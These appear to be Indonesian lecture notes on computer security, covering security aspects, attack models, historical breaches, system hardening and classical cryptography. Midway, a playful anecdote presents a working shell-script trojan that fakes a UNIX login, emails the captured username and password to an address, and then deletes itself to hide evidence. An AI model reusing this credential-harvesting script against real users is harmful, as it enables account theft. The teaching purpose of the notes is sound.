KEAMANAN KOMPUTER
PENDAHULUAN
Modal dasar :
·
Mengetahui Bahasa Pemrograman
·
Menguasai pengetahuan perangkat keras dan perangkat
lunak pengontrolnya (logika interfacing).
·
Menguasai pengelolaan instalasi komputer.
·
Menguasai dengan baik teori jaringan komputer ;
protokol, infrastruktur, media komunikasi.
·
Memahami cara kerja system operasi.
·
Memiliki ‘pikiran jahat’ ;-p
Pengertian
Keamanan Komputer :
Keamanan komputer adalah suatu cabang teknologi
yang dikenal dengan nama keamanan informasi yang diterapkan pada komputer.
Sasaran keamanan komputer antara lain adalah sebagai perlindungan informasi
terhadap pencurian atau korupsi, atau pemeliharaan ketersediaan, seperti
dijabarkan dalam kebijakan keamanan.
Menurut Garfinkel dan Spafford, ahli dalam computer
security, komputer dikatakan aman jika bisa diandalkan dan perangkat
lunaknya bekerja sesuai dengan yang diharapkan. Keamanan komputer memiliki 5
tujuan, yaitu:
- Availability
- Confidentiality
- Data Integrity
- Control
- Audit
Keamanan Komputer Mengapa dibutuhkan ?
·
“information-based society”, menyebabkan nilai informasi menjadi sangat penting dan menuntut kemampuan
untuk mengakses dan menyediakan informasi secara cepat dan akurat menjadi
sangat esensial bagi sebuah organisasi,
·
Infrastruktur Jaringan komputer, seperti LAN dan Internet, memungkinkan untuk menyediakan informasi
secara cepat, sekaligus membuka potensi adanya lubang keamanan (security hole)
Kejahatan Komputer semakin meningkat
karena :
·
Aplikasi bisnis berbasis TI dan
jaringan komputer meningkat : online banking, e-commerce, Electronic data
Interchange (EDI).
·
Desentralisasi server.
·
Transisi dari single vendor ke
multi vendor.
·
Meningkatnya kemampuan pemakai
(user).
·
Kesulitan penegak hokum dan
belum adanya ketentuan yang pasti.
·
Semakin kompleksnya system yang
digunakan, semakin besarnya source code program yang digunakan.
·
Berhubungan dengan internet.
Klasifikasi kejahatan Komputer :
Menurut David Icove [John D.
Howard, “An Analysis Of Security Incidents On The Internet 1989 - 1995,”
PhD thesis, Engineering and Public Policy, Carnegie Mellon University, 1997.]
berdasarkan lubang keamanan, keamanan dapat
diklasifikasikan
menjadi empat, yaitu:
- Keamanan yang bersifat fisik (physical security): termasuk akses orang
ke gedung, peralatan, dan media yang digunakan. Contoh :
·
Wiretapping atau hal-hal yang ber-hubungan dengan akses ke kabel atau
komputer yang digunakan juga dapat dimasukkan ke dalam kelas ini.
·
Denial of service, dilakukan misalnya dengan mematikan peralatan atau membanjiri saluran
komunikasi dengan pesan-pesan (yang dapat berisi apa saja karena yang
diuta-makan adalah banyaknya jumlah pesan).
·
Syn Flood Attack, dimana sistem (host) yang dituju dibanjiri oleh permintaan
sehingga dia menjadi ter-lalu sibuk dan bahkan dapat berakibat macetnya sistem (hang).
- Keamanan yang berhubungan dengan orang
(personel),
Contoh :
·
Identifikasi user (username dan password)
·
Profil resiko dari orang yang mempunyai akses (pemakai dan pengelola).
- Keamanan dari data dan media serta teknik komunikasi (communications).
- Keamanan dalam operasi: Adanya prosedur yang digunakan untuk mengatur dan mengelola sistem keamanan, dan juga ter-masuk prosedur setelah serangan (post attack recovery).
ASPEK
KEAMANAN KOMPUTER :
Menurut Garfinkel [Simson
Garfinkel, “PGP: Pretty Good Privacy,” O’Reilly & Associ-ates, Inc.,
1995. ]
1. Privacy / Confidentiality
·
Defenisi : menjaga informasi dari orang yang tidak berhak mengakses.
·
Privacy : lebih kearah data-data
yang sifatnya privat , Contoh : e-mail seorang pemakai (user) tidak
boleh dibaca oleh administrator.
·
Confidentiality : berhubungan
dengan data yang diberikan ke pihak lain untuk keperluan tertentu dan hanya
diperbolehkan untuk keperluan tertentu tersebut.
·
Contoh : data-data yang sifatnya
pribadi (seperti nama, tempat tanggal lahir, social security number, agama,
status perkawinan, penyakit yang pernah diderita, nomor kartu kredit, dan
sebagainya) harus dapat diproteksi dalam penggunaan dan penyebarannya.
·
Bentuk Serangan : usaha penyadapan (dengan program sniffer).
·
Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy dan
confidentiality adalah dengan menggunakan teknologi kriptografi.
Integrity
·
Defenisi : informasi tidak boleh diubah tanpa seijin pemilik informasi.
·
Contoh : e-mail di intercept di tengah jalan, diubah isinya,
kemudian diteruskan ke alamat yang dituju.
·
Bentuk serangan : Adanya virus, trojan horse, atau pemakai lain
yang mengubah informasi tanpa ijin, “man in the middle attack” dimana seseorang
menempatkan diri di tengah pembicaraan dan menyamar sebagai orang lain.
Authentication
·
Defenisi : metoda untuk menyatakan bahwa informasi betul-betul asli,
atau orang yang mengakses atau memberikan informasi adalah betul-betul orang
yang dimaksud.
·
Dukungan :
·
Adanya Tools membuktikan keaslian dokumen, dapat dilakukan dengan
teknologi watermarking(untuk menjaga “intellectual property”, yaitu
dengan menandai dokumen atau hasil karya dengan “tanda tangan” pembuat ) dan
digital signature.
·
Access control, yaitu berkaitan dengan pembatasan orang yang dapat
mengakses informasi. User harus menggunakan password, biometric (ciri-ciri khas
orang), dan sejenisnya.
Availability
·
Defenisi : berhubungan dengan ketersediaan informasi ketika dibutuhkan.
·
Contoh hambatan :
·
“denial of service attack” (DoS attack), dimana server dikirimi permintaan
(biasanya palsu) yang bertubi-tubi atau permintaan yang diluar perkiraan
sehingga tidak dapat melayani permintaan lain atau bahkan sampai down, hang,
crash.
·
mailbomb,
dimana seorang pemakai dikirimi e-mail bertubi-tubi (katakan ribuan e-mail)
dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e-mailnya
atau kesulitan mengakses e-mailnya.
Access Control
·
Defenisi : cara pengaturan akses
kepada informasi. berhubungan dengan
masalah
·
authentication dan juga privacy
·
Metode : menggunakan kombinasi userid/password atau dengan
·
menggunakan mekanisme lain.
Non-repudiation
·
Defenisi : Aspek ini menjaga agar seseorang tidak dapat menyangkal telah
melakukan sebuah transaksi. Dukungan bagi
electronic commerce.
Security Attack Models
Menurut W. Stallings [William
Stallings, “Network and Internetwork Security,” Prentice
Hall, 1995.] serangan (attack)
terdiri dari :
·
Interruption:
Perangkat sistem menjadi rusak atau tidak tersedia. Serangan ditujukan kepada
ketersediaan (availability) dari sistem. Contoh serangan adalah “denial
of service attack”.
·
Interception:
Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari
serangan ini adalah penyadapan (wiretapping).
·
Modification:
Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat
juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah
mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.
·
Fabrication:
Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari
serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu ke
dalam jaringan komputer.
SECURITY BREACH ACCIDENT
|
1996
|
U.S.
Federal Computer Incident Response Capability (FedCIRC) melaporkan bahwa
lebih dari 2500 “insiden” di system komputer atau jaringan komputer yang
disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol
sistem keamanan
|
|
|
1996
|
FBI
National Computer Crimes Squad, Washington D.C.,
memperkirakan kejahatan komputer yang terdeteksi kurang dari 15%, dan
hanya 10% dari angka itu yang dilaporkan
|
|
|
1997
|
Penelitian
Deloitte Touch Tohmatsu menunjukkan bahwa dari 300 perusahaan di
Australia, 37% (dua diantara lima) pernah
mengalami masalah keamanan sistem komputernya.
|
|
|
1996
|
Inggris,
NCC Information Security Breaches Survey menunjukkan bahwa kejahatan
komputer menaik 200% dari tahun 1995 ke 1996.
Kerugian rata-rata US $30.000 / insiden.
|
|
|
1998
|
FBI melaporkan bahwa kasus
persidangan yang berhubungan
dengan kejahatan komputer
meroket 950% dari tahun 1996 ke
tahun 1997, dengan
penangkapan dari 4 ke 42, dan terbukti
(convicted) di pengadilan naik 88%
dari 16 ke 30 kasus.
|
|
|
|
Dan lain-lain. Dapat dilihat
di www.cert.org
|
|
|
|
|
|
|
Contoh akibat dari jebolnya
sistem keamanan, antara lain:
|
||
|
1988
|
Keamanan sistem mail sendmail
dieksploitasi oleh Robert
Tapan Morris sehingga
melumpuhkan sistem Internet. Kegiatan
ini dapat diklasifikasikan
sebagai “denial of service attack”.
Diperkirakan biaya yang digunakan
untuk memperbaiki dan hal-hal lain yang hilang adalah sekitar $100 juta. Di
tahun 1990 Morris
dihukum (convicted) dan
hanya didenda $10.000.
|
|
|
10
Maret 1997
|
Seorang hacker dari
Massachusetts berhasil mematikan sistem telekomunikasi di sebuah airport
local (Worcester, Massachusetts)
sehingga mematikan komunikasi di control tower dan menghalau pesawat yang
hendak mendarat.
Dia juga mengacaukan sistem
telepon di Rutland, Massachusetts.
|
|
|
1990
|
Kevin Poulsen mengambil alih
system komputer telekomunikasi di Los Angeles untuk memenangkan kuis di
sebuah radio local.
|
|
|
1995
|
Kevin Mitnick, mencuri
20.000 nomor kartu kredit, menyalin system operasi DEC secara illegal dan
mengambil alih hubungan telpon di New York dan California.
|
|
|
1995
|
Vladimir Levin membobol
bank-bank di kawasan Wallstreet, mengambil uang sebesar $10 juta.
|
|
|
2000
|
Fabian Clone menjebol situs
aetna.co.id dan Jakarta mail dan membuat directory atas namanya berisi
peringatan terhadap administrator situs tersebut.
|
|
|
2000
|
Beberapa web site Indonesia
sudah dijebol dan daftarnya (beserta
contoh halaman yang sudah
dijebol) dapat dilihat di koleksi
<http://www.2600.com>
|
|
|
2000
|
Wenas, membuat server sebuah
ISP di singapura down
|
|
MEMAHAMI
HACKER BEKERJA
Secara umum melalui tahapan-tahapan sebagai berikut :
1. Tahap mencari
tahu system komputer sasaran.
2. Tahap penyusupan
3. Tahap
penjelajahan
4. Tahap keluar dan
menghilangkan jejak.
Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :
Seorang
gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki
potensi memancing pengelola sistem komputer (administrator pemegang account
root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan
tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem
komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai
administrator UNIX. "Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda
trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER"
–ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN :
$PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login
Incorrect"
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan
ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem
UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah
perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya
tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat
beda dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta
pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka
segera timbul pesan
Login:root
Password:
********
Login
Incorrect
Tentu saja Administrator UNIX akan kaget
bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi
login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka
loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba
login dan mengisi password pada layar di atas, setelah itu maka otomatis data
login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai
disini maka si gadis lugu dan genit telah mendapatkan login dan password . . .
ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program
ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak
(masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada
2 baris terakhir dari program my_login di atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses
penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian
hilanglah program tersebut yang tentunya juga menhilangkan barang bukti.
Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . .
hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta
kuliahnya.
Sukses dari program ini sebenarnya sangat tergantung dari bagaimana
agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus
berusaha memancing agar pemilik root menjalankan program ini.
PRINSIP
DASAR PERANCANGAN SISTEM YANG AMAN
1. Mencegah
hilangnya data
2. Mencegah masuknya
penyusup
LAPISAN KEAMANAN :
1. Lapisan Fisik :
·
membatasi akses fisik ke mesin :
o
Akses masuk ke ruangan komputer
o
penguncian komputer secara hardware
o
keamanan BIOS
o
keamanan Bootloader
·
back-up data :
o
pemilihan piranti back-up
o
penjadwalan back-up
·
mendeteksi gangguan fisik :
·
log file : Log pendek atau tidak lengkap, Log yang
berisikan waktu yang aneh, Log dengan permisi atau kepemilikan yang tidak
tepat, Catatan pelayanan reboot atau restart, Log yang hilang, masukan su atau
login dari tempat yang janggal
·
mengontrol akses sumber daya.
2. Keamanan lokal
Berkaitan dengan
user dan hak-haknya :
·
Beri mereka fasilitas minimal yang diperlukan.
·
Hati-hati terhadap saat/dari mana mereka login, atau
tempat seharusnya mereka login.
·
Pastikan dan hapus rekening mereka ketika mereka
tidak lagi membutuhkan akses.
3. Keamanan Root
·
Ketika melakukan perintah yang kompleks, cobalah
dalam cara yang tidak merusak dulu, terutama perintah yang menggunakan globbing:
contoh, anda ingin melakukan "rm foo*.bak", pertama coba dulu:
"ls foo*.bak" dan pastikan anda ingin menghapus file-file yang anda
pikirkan.
·
Beberapa orang merasa terbantu ketika melakukan
"touch /-i" pada sistem mereka. Hal ini akan membuat perintah-perintah
seperti : "rm -fr *" menanyakan apakah anda benar-benar ingin
menghapus seluruh file. (Shell anda menguraikan "-i" dulu, dan
memberlakukannya sebagai option -i ke rm).
·
Hanya menjadi root ketika melakukan tugas tunggal
tertentu. Jika anda berusaha mengetahui bagaimana melakukan sesuatu, kembali ke
shell pemakai normal hingga anda yakin apa yang perlu dilakukan oleh root.
·
Jalur perintah untuk pemakai root sangat penting.
Jalur perintah, atau variabel lingkungan PATH mendefinisikan lokal yang dicari
shell untuk program. Cobalah dan batasi jalur perintah bagi pemakai root
sedapat mungkin, dan jangan pernah menggunakan '.', yang berarti 'direktori
saat ini', dalam pernyataan PATH anda. Sebagai tambahan, jangan pernah menaruh
direktori yang dapat ditulis pada jalur pencarian anda, karena hal ini
memungkinkan penyerang memodifikasi atau menaruh file biner dalam jalur
pencarian anda, yang memungkinkan mereka menjadi root ketika anda menjalankan
perintah tersebut.
·
Jangan pernah menggunakan seperangkat utilitas
rlogin/rsh/rexec (disebut utilitas r) sebagai root. Mereka menjadi sasaran
banyak serangan, dan sangat berbahaya bila dijalankan sebagai root. Jangan
membuat file .rhosts untuk root.
·
File /etc/securetty berisikan daftar
terminal-terminal tempat root dapat login. Secara baku (pada RedHat Linux)
diset hanya pada konsol virtual lokal (vty). Berhati-hatilah saat menambahkan
yang lain ke file ini. Anda seharusnya login dari jarak jauh sebagai pemakai
biasa dan kemudian 'su' jika anda butuh (mudah-mudahan melalui ssh atau saluran
terenkripsi lain), sehingga tidak perlu untuk login secara langsung sebagai
root.
·
Selalu perlahan dan berhati-hati ketika menjadi
root. Tindakan anda dapat mempengaruhi banyak hal. Pikir sebelum anda mengetik!
4. Keamanan File dan system file
·
Directory home user tidak boleh mengakses perintah
mengubah system seperti partisi, perubahan device dan lain-lain.
·
Lakukan setting limit system file.
·
Atur akses dan permission file : read, writa,
execute bagi user maupun group.
·
Selalu cek program-program yang tidak dikenal
5. Keamanan Password dan Enkripsi
·
Hati-hati terhadap bruto force attack dengan membuat
password yang baik.
·
Selalu mengenkripsi file yang dipertukarkan.
·
Lakukan pengamanan pada level tampilan, seperti
screen saver.
6. Keamanan Kernel
·
selalu update kernel system operasi.
·
Ikuti review bugs dan kekurang-kekurangan pada
system operasi.
7. Keamanan Jaringan
·
Waspadai paket sniffer yang sering menyadap port
Ethernet.
·
Lakukan prosedur untuk mengecek integritas data
·
Verifikasi informasi DNS
·
Lindungi network file system
·
Gunakan firewall untuk barrier antara jaringan
privat dengan jaringan eksternal
KRIPTOGRAFI
DEFENISI
Cryptography adalah suatu ilmu
ataupun seni mengamankan pesan, dan dilakukan oleh cryptographer.
Cryptanalysis adalah suatu ilmu dan
seni membuka (breaking) ciphertext dan orang yang melakukannya disebut cryptanalyst.
ELEMEN

CRYPTOSYSTEM
Cryptographic system atau cryptosystem adalah
suatu fasilitas untuk mengkonversikan plaintext ke ciphertext dan sebaliknya.
Dalam sistem ini, seperangkat parameter yang menentukan transformasi
pencipheran tertentu disebut suatu set kunci. Proses enkripsi dan dekripsi
diatur oleh satu atau beberapa kunci kriptografi.
1. Kriptografi dapat memenuhi kebutuhan umum suatu transaksi:
1. Kerahasiaan (confidentiality)
dijamin dengan melakukan enkripsi (penyandian).
2. Keutuhan (integrity)
atas data-data pembayaran dilakukan dengan fungsi hash satu arah.
3. Jaminan atas
identitas dan keabsahan (authenticity) pihak-pihak yang melakukan
transaksi dilakukan dengan menggunakan password atau sertifikat digital.
Sedangkan keotentikan data transaksi dapat dilakukan dengan tanda tangan
digital.
4. Transaksi dapat
dijadikan barang bukti yang tidak bisa disangkal (non-repudiation)
dengan memanfaatkan tanda tangan digital dan sertifikat digital.
2. Karakteristik cryptosytem yang baik
sebagai berikut :
- Keamanan
sistem terletak pada kerahasiaan kunci dan bukan pada kerahasiaan
algoritma yang digunakan.
- Cryptosystem
yang baik memiliki ruang kunci (keyspace) yang besar.
- Cryptosystem
yang baik akan menghasilkan ciphertext yang terlihat acak dalam seluruh
tes statistik yang dilakukan terhadapnya.
- Cryptosystem
yang baik mampu menahan seluruh serangan yang telah dikenal sebelumnya
3. MACAM CRYPTOSYSTEM
A. Symmetric Cryptosystem
Dalam symmetric cryptosystem ini, kunci yang digunakan untuk proses
enkripsi dan dekripsi pada prinsipnya identik, tetapi satu buah kunci dapat
pula diturunkan dari kunci yang lainnya. Kunci-kunci ini harus dirahasiakan.
Oleh karena itulah sistem ini sering disebut sebagai secret-key ciphersystem.
Jumlah kunci yang dibutuhkan umumnya adalah :
nC2
= n . (n-1)
--------
2
--------
2
dengan n menyatakan banyaknya pengguna.
Contoh dari sistem ini adalah Data Encryption Standard (DES), Blowfish, IDEA.
Contoh dari sistem ini adalah Data Encryption Standard (DES), Blowfish, IDEA.
B. Assymmetric Cryptosystem
Dalam assymmetric cryptosystem ini digunakan dua buah kunci. Satu kunci
yang disebut kunci publik (public key) dapat dipublikasikan, sedang
kunci yang lain yang disebut kunci privat (private key) harus
dirahasiakan. Proses menggunakan sistem ini dapat diterangkan secara sederhana
sebagai berikut : bila A ingin mengirimkan pesan kepada B, A dapat menyandikan
pesannya dengan menggunakan kunci publik B, dan bila B ingin membaca surat
tersebut, ia perlu mendekripsikan surat itu dengan kunci privatnya. Dengan
demikian kedua belah pihak dapat menjamin asal surat serta keaslian surat tersebut,
karena adanya mekanisme ini. Contoh sistem ini antara lain RSA Scheme dan
Merkle-Hellman Scheme.
4. PROTOKOL CRYPTOSYSTEM
Cryptographic
protocol adalah suatu protokol yang menggunakan kriptografi. Protokol ini
melibatkan sejumlah algoritma kriptografi, namun secara umum tujuan protokol
lebih dari sekedar kerahasiaan. Pihak-pihak yang berpartisipasi mungkin saja
ingin membagi sebagian rahasianya untuk menghitung sebuah nilai, menghasilkan
urutan random, atau pun menandatangani kontrak secara bersamaan.
Penggunaan
kriptografi dalam sebuah protokol terutama ditujukan untuk mencegah atau pun
mendeteksi adanya eavesdropping dan cheating.
5. JENIS PENYERANGAN PADA PROTOKOL
·
Ciphertext-only attack. Dalam penyerangan ini,
seorang cryptanalyst memiliki ciphertext dari sejumlah pesan yang seluruhnya
telah dienkripsi menggunakan algoritma yang sama.
·
Known-plaintext attack. Dalam tipe penyerangan ini,
cryptanalyst memiliki akses tidak hanya ke ciphertext sejumlah pesan, namun ia
juga memiliki plaintext pesan-pesan tersebut.
·
Chosen-plaintext attack. Pada penyerangan ini,
cryptanalyst tidak hanya memiliki akses atas ciphertext dan plaintext untuk
beberapa pesan, tetapi ia juga dapat memilih plaintext yang dienkripsi.
·
Adaptive-chosen-plaintext attack. Penyerangan tipe
ini merupakan suatu kasus khusus chosen-plaintext attack. Cryptanalyst tidak
hanya dapat memilih plaintext yang dienkripsi, ia pun memiliki kemampuan untuk
memodifikasi pilihan berdasarkan hasil enkripsi sebelumnya. Dalam
chosen-plaintext attack, cryptanalyst mungkin hanya dapat memiliki plaintext
dalam suatu blok besar untuk dienkripsi; dalam adaptive-chosen-plaintext attack
ini ia dapat memilih blok plaintext yang lebih kecil dan kemudian memilih yang
lain berdasarkan hasil yang pertama, proses ini dapat dilakukannya terus
menerus hingga ia dapat memperoleh seluruh informasi.
·
Chosen-ciphertext attack. Pada tipe ini,
cryptanalyst dapat memilih ciphertext yang berbeda untuk didekripsi dan
memiliki akses atas plaintext yang didekripsi.
·
Chosen-key attack. Cryptanalyst pada tipe
penyerangan ini memiliki pengetahuan tentang hubungan antara kunci-kunci yang
berbeda.
·
Rubber-hose cryptanalysis. Pada tipe penyerangan
ini, cryptanalyst mengancam, memeras, atau bahkan memaksa seseorang hingga
mereka memberikan kuncinya.
6. JENIS PENYERANGAN PADA JALUR KOMUNIKASI
·
Sniffing: secara harafiah berarti
mengendus, tentunya dalam hal ini yang diendus adalah pesan (baik yang belum
ataupun sudah dienkripsi) dalam suatu saluran komunikasi. Hal ini umum terjadi
pada saluran publik yang tidak aman. Sang pengendus dapat merekam pembicaraan
yang terjadi.
·
Replay attack [DHMM 96]: Jika seseorang
bisa merekam pesan-pesan handshake (persiapan komunikasi), ia mungkin
dapat mengulang pesan-pesan yang telah direkamnya untuk menipu salah satu
pihak.
·
Spoofing [DHMM 96]: Penyerang –
misalnya Maman – bisa menyamar menjadi Anto. Semua orang dibuat percaya bahwa
Maman adalah Anto. Penyerang berusaha meyakinkan pihak-pihak lain bahwa tak ada
salah dengan komunikasi yang dilakukan, padahal komunikasi itu dilakukan dengan
sang penipu/penyerang. Contohnya jika orang memasukkan PIN ke dalam mesin ATM
palsu – yang benar-benar dibuat seperti ATM asli – tentu sang penipu bisa
mendapatkan PIN-nya dan copy pita magentik kartu ATM milik sang nasabah. Pihak
bank tidak tahu bahwa telah terjadi kejahatan.
·
Man-in-the-middle [Schn 96]: Jika spoofing
terkadang hanya menipu satu pihak, maka dalam skenario ini, saat Anto hendak
berkomunikasi dengan Badu, Maman di mata Anto seolah-olah adalah Badu, dan
Maman dapat pula menipu Badu sehingga Maman seolah-olah adalah Anto. Maman
dapat berkuasa penuh atas jalur komunikas ini, dan bisa membuat berita fitnah.
METODE
CRYPTOGRAFI
1. METODE KUNO
a. 475 S.M. bangsa Sparta, suatu bangsa militer pada jaman Yunani kuno,
menggunakan teknik kriptografi yang disebut scytale, untuk kepentingan perang.
Scytale terbuat dari tongkat dengan papyrus yang mengelilinginya secara spiral.
Kunci dari scytale adalah diameter
tongkat yang digunakan oleh pengirim harus sama dengan diameter tongkat yang
dimiliki oleh penerima pesan, sehingga pesan yang disembunyikan dalam papyrus
dapat dibaca dan dimengerti oleh penerima.

b. Julius Caesar, seorang kaisar terkenal Romawi yang menaklukkan
banyak bangsa di Eropa dan Timur Tengah juga menggunakan suatu teknik
kriptografi yang sekarang disebut Caesar cipher untuk berkorespondensi sekitar
tahun 60 S.M. Teknik yang digunakan oleh Sang Caesar adalah mensubstitusikan
alfabet secara beraturan, yaitu oleh alfabet ketiga yang mengikutinya,
misalnya, alfabet ‘’A" digantikan oleh "D", "B" oleh
"E", dan seterusnya. Sebagai contoh, suatu pesan berikut :

Gambar 2. Caesar Cipher
Dengan aturan yang dibuat oleh Julius Caesar tersebut, pesan sebenarnya
adalah "Penjarakan panglima divisi ke tujuh segera".
2. TEKNIK DASAR KRIPTOGRAFI
a. Substitusi
Salah satu contoh teknik ini adalah Caesar cipher yang telah
dicontohkan diatas. Langkah pertama adalah membuat suatu tabel substitusi.
Tabel substitusi dapat dibuat sesuka hati, dengan catatan bahwa penerima pesan
memiliki tabel yang sama untuk keperluan dekripsi. Bila tabel substitusi dibuat
secara acak, akan semakin sulit pemecahan ciphertext oleh orang yang tidak
berhak.
A-B-C-D-E-F-G-H-I-J-K-L-M-N-O-P-Q-R-S-T-U-V-W-X-Y-Z-1-2-3-4-5-6-7-8-9-0-.-,
B-F-1-K-Q-G-A-T-P-J-6-H-Y-D-2-X-5-M-V-7-C-8-4-I-9-N-R-E-U-3-L-S-W-,-.-O-Z-0
Gambar 3. Tabel Substitusi
Tabel substitusi diatas dibuat secara acak. Dengan menggunakan tabel
tersebut, dari plaintext "5 teknik dasar kriptografi" dihasilkan
ciphertext "L 7Q6DP6 KBVBM 6MPX72AMBGP". Dengan menggunakan tabel
substitusi yang sama secara dengan arah yang terbalik (reverse), plaintext
dapat diperoleh kembali dari ciphertext-nya.
b.
Blocking
Sistem enkripsi terkadang membagi plaintext menjadi blok-blok yang
terdiri dari beberapa karakter yang kemudian dienkripsikan secara independen.
Plaintext yang dienkripsikan dengan menggunakan teknik blocking adalah :
|

Gambar 4. Enkripsi dengan
Blocking
Dengan menggunakan enkripsi blocking dipilih jumlah lajur dan kolom
untuk penulisan pesan. Jumlah lajur atau kolom menjadi kunci bagi kriptografi
dengan teknik ini. Plaintext dituliskan secara vertikal ke bawah berurutan pada
lajur, dan dilanjutkan pada kolom berikutnya sampai seluruhnya tertulis.
Ciphertext-nya adalah hasil pembacaan plaintext secara horizontal berurutan
sesuai dengan blok-nya. Jadi ciphertext yang dihasilkan dengan teknik ini
adalah "5K G KRTDRAEAIFKSPINAT IRO". Plaintext dapat pula ditulis
secara horizontal dan ciphertextnya adalah hasil pembacaan secara vertikal.
c. Permutasi
Salah satu teknik enkripsi yang terpenting adalah permutasi atau sering
juga disebut transposisi. Teknik ini memindahkan atau merotasikan karakter
dengan aturan tertentu. Prinsipnya adalah berlawanan dengan teknik substitusi.
Dalam teknik substitusi, karakter berada pada posisi yang tetap tapi
identitasnya yang diacak. Pada teknik permutasi, identitas karakternya tetap,
namun posisinya yang diacak. Sebelum dilakukan permutasi, umumnya plaintext
terlebih dahulu dibagi menjadi blok-blok dengan panjang yang sama.
Untuk contoh diatas, plaintext akan
dibagi menjadi blok-blok yang terdiri dari 6 karakter, dengan aturan permutasi
sebagai berikut :

Gambar 5. Permutasi
Dengan menggunakan aturan diatas, maka proses enkripsi dengan permutasi
dari plaintext adalah sebagai berikut :

Gambar 6. Proses Enkripsi
dengan Permutasi
Ciphertext yang dihasilkan dengan teknik permutasi ini adalah "N
ETK5 SKD AIIRK RAATGORP FI".
d. Ekspansi
Suatu metode sederhana untuk mengacak pesan adalah dengan memelarkan
pesan itu dengan aturan tertentu. Salah satu contoh penggunaan teknik ini
adalah dengan meletakkan huruf konsonan atau bilangan ganjil yang menjadi awal dari
suatu kata di akhir kata itu dan menambahkan akhiran "an". Bila suatu
kata dimulai dengan huruf vokal atau bilangan genap, ditambahkan akhiran
"i". Proses enkripsi dengan cara ekspansi terhadap plaintext terjadi
sebagai berikut :

Gambar 7. Enkripsi dengan
Ekspansi
Ciphertextnya adalah "5AN EKNIKTAN
ASARDAN RIPTOGRAFIKAN". Aturan ekspansi dapat dibuat lebih kompleks.
Terkadang teknik ekspansi digabungkan dengan teknik lainnya, karena teknik ini
bila berdiri sendiri terlalu mudah untuk dipecahkan.
e. Pemampatan (Compaction)
Mengurangi panjang pesan atau jumlah bloknya adalah cara lain untuk
menyembunyikan isi pesan. Contoh sederhana ini menggunakan cara menghilangkan
setiap karakter ke-tiga secara berurutan. Karakter-karakter yang dihilangkan
disatukan kembali dan disusulkan sebagai "lampiran" dari pesan utama,
dengan diawali oleh suatu karakter khusus, dalam contoh ini digunakan "&".
Proses yang terjadi untuk plaintext kita adalah :

Gambar 8. Enkripsi dengan
Pemampatan
Aturan penghilangan karakter dan karakter
khusus yang berfungsi sebagai pemisah menjadi dasar untuk proses dekripsi
ciphertext menjadi plaintext kembali.
Dengan menggunakan kelima teknik dasar kriptografi diatas, dapat
diciptakan kombinasi teknik kriptografi yang amat banyak, dengan faktor yang
membatasi semata-mata hanyalah kreativitas dan imajinasi kita. Walaupun sekilas
terlihat sederhana, kombinasi teknik dasar kriptografi dapat menghasilkan
teknik kriptografi turunan yang cukup kompleks, dan beberapa teknik dasar
kriptografi masih digunakan dalam teknik kriptografi modern.
BERBAGAI
SOLUSI ENKRIPSI MODERN
- Data
Encryption Standard (DES)
·
standar bagi USA Government
·
didukung ANSI dan IETF
·
popular untuk
metode secret key
·
terdiri dari : 40-bit, 56-bit dan 3x56-bit (Triple
DES)
- Advanced
Encryption Standard (AES)
·
untuk menggantikan DES (launching akhir 2001)
·
menggunakan variable length block chipper
·
key length : 128-bit, 192-bit, 256-bit
·
dapat diterapkan untuk smart card.
- Digital
Certificate Server (DCS)
·
verifikasi untuk digital signature
·
autentikasi user
·
menggunakan public dan private key
·
